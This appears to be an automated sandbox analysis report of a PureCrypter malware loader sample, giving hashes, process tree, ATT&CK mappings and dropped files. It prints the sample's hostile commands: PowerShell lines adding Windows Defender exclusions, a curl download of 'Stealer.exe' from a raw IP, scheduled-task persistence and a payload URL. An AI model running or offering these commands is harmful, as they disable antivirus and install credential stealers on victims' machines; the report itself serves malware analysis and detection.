purecrypter | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b

Analysis

max time kernel
92s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2023 07:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Size

1.3MB
MD5

f1c29ba01377c35e6f920f0aa626eaf5
SHA1

7b2c191bc2d5d549c5e65613f93d59ece1842f02
SHA256

c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b
SHA512

449a9d0ec42f83be09ef7a258f50f3d07728bb9f06361dc4aebdcbcce0ca010a3c894a5d27d98f197d6b4b85be4e3639656ae75a0216e8e169c54717ad2a85f0
SSDEEP

24576:hT+ua8m657w6ZBLmkitKqBCjC0PDgM5AVnipXD1Z+7:hcVV1BCjBG2

Score

10^/10

purecrypter downloader loader

Malware Config

Extracted

Family

purecrypter

https://cents-ability.org/loader/uploads/noicon_Ujizjydo.bmp

Signatures

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter
Executes dropped EXE 2 IoCs

Processes:

noicon.exeStearler.exe

pid process

1772 noicon.exe
64 Stearler.exe

pid	process
1772	noicon.exe
64	Stearler.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exeStearler.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	Stearler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3644 schtasks.exe
2168 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4288 powershell.exe
4288 powershell.exe
3420 powershell.exe
3420 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

noicon.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1772 noicon.exe
Token: SeDebugPrivilege 4288 powershell.exe
Token: SeDebugPrivilege 3420 powershell.exe

pid	process
3644	schtasks.exe
2168	schtasks.exe

pid	process
4288	powershell.exe
4288	powershell.exe
3420	powershell.exe
3420	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1772	noicon.exe
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeDebugPrivilege	3420	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.execmd.exeStearler.execmd.exe

description	pid	process	target process
PID 4732 wrote to memory of 1772	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	noicon.exe
PID 4732 wrote to memory of 1772	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	noicon.exe
PID 4732 wrote to memory of 1772	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	noicon.exe
PID 4732 wrote to memory of 64	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	Stearler.exe
PID 4732 wrote to memory of 64	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	Stearler.exe
PID 4732 wrote to memory of 64	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	Stearler.exe
PID 4732 wrote to memory of 2592	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	cmd.exe
PID 4732 wrote to memory of 2592	4732	c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe	cmd.exe
PID 2592 wrote to memory of 3644	2592	cmd.exe	schtasks.exe
PID 2592 wrote to memory of 3644	2592	cmd.exe	schtasks.exe
PID 2592 wrote to memory of 2168	2592	cmd.exe	schtasks.exe
PID 2592 wrote to memory of 2168	2592	cmd.exe	schtasks.exe
PID 64 wrote to memory of 3456	64	Stearler.exe	cmd.exe
PID 64 wrote to memory of 3456	64	Stearler.exe	cmd.exe
PID 64 wrote to memory of 3456	64	Stearler.exe	cmd.exe
PID 3456 wrote to memory of 4288	3456	cmd.exe	powershell.exe
PID 3456 wrote to memory of 4288	3456	cmd.exe	powershell.exe
PID 3456 wrote to memory of 4288	3456	cmd.exe	powershell.exe
PID 3456 wrote to memory of 3420	3456	cmd.exe	powershell.exe
PID 3456 wrote to memory of 3420	3456	cmd.exe	powershell.exe
PID 3456 wrote to memory of 3420	3456	cmd.exe	powershell.exe
PID 3456 wrote to memory of 4400	3456	cmd.exe	curl.exe
PID 3456 wrote to memory of 4400	3456	cmd.exe	curl.exe
PID 3456 wrote to memory of 4400	3456	cmd.exe	curl.exe

C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4732

C:\Users\Administrator\Desktop\DROP\noicon.exe
"C:\Users\Administrator\Desktop\DROP\noicon.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Users\Administrator\Desktop\DROP\Stearler.exe
"C:\Users\Administrator\Desktop\DROP\Stearler.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:64

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".vbs"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\SysWOW64\curl.exe
curl http://140.82.34.147/Stealer.exe -o C:\Users\Public\Downloads\Stealer.exe
4⤵
PID:4400

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\system32\schtasks.exe
schtasks /create /tn "testM" /xml "C:\Users\Admin\AppData\Local\Temp\f1.xml"
3⤵
- Creates scheduled task(s)
PID:3644

C:\Windows\system32\schtasks.exe
schtasks /create /tn "test" /xml "C:\Users\Admin\AppData\Local\Temp\f2.xml"
3⤵
- Creates scheduled task(s)
PID:2168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
443d4812f2139e4bcde2e71bbac34f60

SHA1
0e10245065ef5fe6979b522098d21993b2346c52

SHA256
1fec33ac2be90b663a7d1d530308bc8367b5c932fcc4b0dee550fbb248ec7919

SHA512
e53f16a34651487650156c2c842e8af4fc6d13b1548bc2e665599fb43992a4c22ba6f572bcb44d2a44ac5c7479cc5d7e689a906363436d393e3444f0ecbf3517

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat
Filesize
14KB

MD5
40e65da3d99568737a62d30060539f23

SHA1
c5b616eb054a850b019da2d19e42b82575a269c1

SHA256
a9ea79963c53c3756fc752d4a2978a86de6038fc728fabc200bc87cd938406e5

SHA512
ef19c1001097545955c2d4c3de48bcda7633459577cf3f54653ae0c89fea5e61e763645bdcd2027c303522c98a02893df1f7195b3d26d38a808e7cc78a5c325d

Download Submit
C:\Users\Admin\AppData\Local\Temp\f1.xml
Filesize
1KB

MD5
d5d149b6de60fc4b8ae79a4123955efa

SHA1
9e76a623ff4999c3a0597000fc92d8c16b64b783

SHA256
381a91077f6813b09c642ecc089b362460384e19727adfcf6852121d06965cdf

SHA512
2f3c92063df61b1d3ea186763121b203839c30f2cc528fd7abf9cfffded16144edc98a2e52d331d4975c858081b8067c0ca5c028e21cb8c78cfbda0eb899aca0

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2.xml
Filesize
1KB

MD5
bde3b9bcaba83190f1b8793b5997cd00

SHA1
a386e5ef10c24df4c5b667aaaadae8604d6c1efa

SHA256
756ce3e406b95d8c2a88e0a154eb0c7b12fa5f825046d400ff25ccf86dd1decc

SHA512
dae4c9a06e9ba61146ad25ff376690949d9d9a50a8be87ece4c25da63ce47c261737bff8a284e3966b38aa410dfccee8bf6bb38d024a5ac8041e8dc8b55d10cc

Download Submit
C:\Users\Administrator\Desktop\DROP\Stearler.exe
Filesize
127KB

MD5
c07c33c5e7c12107f2788280ad31c391

SHA1
8e14f012e98c39d6b20fe14a7532f299e5c001a0

SHA256
389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967

SHA512
8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

Download Submit
C:\Users\Administrator\Desktop\DROP\Stearler.exe
Filesize
127KB

MD5
c07c33c5e7c12107f2788280ad31c391

SHA1
8e14f012e98c39d6b20fe14a7532f299e5c001a0

SHA256
389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967

SHA512
8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

Download Submit
C:\Users\Administrator\Desktop\DROP\noicon.exe
Filesize
16.0MB

MD5
fdd4cd11d278dab26c2c8551e006c4ed

SHA1
f0ef434d38fa11f8bc38cbc90874ca582867b214

SHA256
80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05

SHA512
9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

Download Submit
C:\Users\Administrator\Desktop\DROP\noicon.exe
Filesize
16.0MB

MD5
fdd4cd11d278dab26c2c8551e006c4ed

SHA1
f0ef434d38fa11f8bc38cbc90874ca582867b214

SHA256
80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05

SHA512
9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

Download Submit
memory/64-139-0x0000000000000000-mapping.dmp

Download
memory/1772-146-0x0000000000710000-0x0000000000718000-memory.dmp

Filesize
32KB

Download
memory/1772-137-0x0000000000000000-mapping.dmp

Download
memory/2168-148-0x0000000000000000-mapping.dmp

Download
memory/2592-143-0x0000000000000000-mapping.dmp

Download
memory/3420-169-0x0000000000000000-mapping.dmp

Download
memory/3420-172-0x000000006F410000-0x000000006F45C000-memory.dmp

Filesize
304KB

Download
memory/3456-150-0x0000000000000000-mapping.dmp

Download
memory/3644-144-0x0000000000000000-mapping.dmp

Download
memory/4288-152-0x0000000000000000-mapping.dmp

Download
memory/4288-161-0x00000000065C0000-0x00000000065DE000-memory.dmp

Filesize
120KB

Download
memory/4288-168-0x00000000075B0000-0x00000000075B8000-memory.dmp

Filesize
32KB

Download
memory/4288-153-0x0000000002760000-0x0000000002796000-memory.dmp

Filesize
216KB

Download
memory/4288-154-0x0000000005270000-0x0000000005898000-memory.dmp

Filesize
6.2MB

Download
memory/4288-155-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/4288-156-0x00000000058A0000-0x0000000005906000-memory.dmp

Filesize
408KB

Download
memory/4288-157-0x0000000005A00000-0x0000000005A66000-memory.dmp

Filesize
408KB

Download
memory/4288-158-0x0000000006040000-0x000000000605E000-memory.dmp

Filesize
120KB

Download
memory/4288-159-0x0000000006610000-0x0000000006642000-memory.dmp

Filesize
200KB

Download
memory/4288-160-0x000000006F410000-0x000000006F45C000-memory.dmp

Filesize
304KB

Download
memory/4288-167-0x0000000007680000-0x000000000769A000-memory.dmp

Filesize
104KB

Download
memory/4288-162-0x0000000007980000-0x0000000007FFA000-memory.dmp

Filesize
6.5MB

Download
memory/4288-163-0x0000000007330000-0x000000000734A000-memory.dmp

Filesize
104KB

Download
memory/4288-164-0x0000000007390000-0x000000000739A000-memory.dmp

Filesize
40KB

Download
memory/4288-165-0x00000000075C0000-0x0000000007656000-memory.dmp

Filesize
600KB

Download
memory/4288-166-0x0000000007560000-0x000000000756E000-memory.dmp

Filesize
56KB

Download
memory/4400-173-0x0000000000000000-mapping.dmp

Download
memory/4732-145-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmp

Filesize
10.8MB

Download
memory/4732-132-0x0000000000C30000-0x0000000000D78000-memory.dmp

Filesize
1.3MB

Download
memory/4732-136-0x000000001C630000-0x000000001C652000-memory.dmp

Filesize
136KB

Download
memory/4732-135-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmp

Filesize
10.8MB

Download
memory/4732-134-0x00000000015C0000-0x00000000015DE000-memory.dmp

Filesize
120KB

Download
memory/4732-133-0x000000001C510000-0x000000001C586000-memory.dmp

Filesize
472KB

Download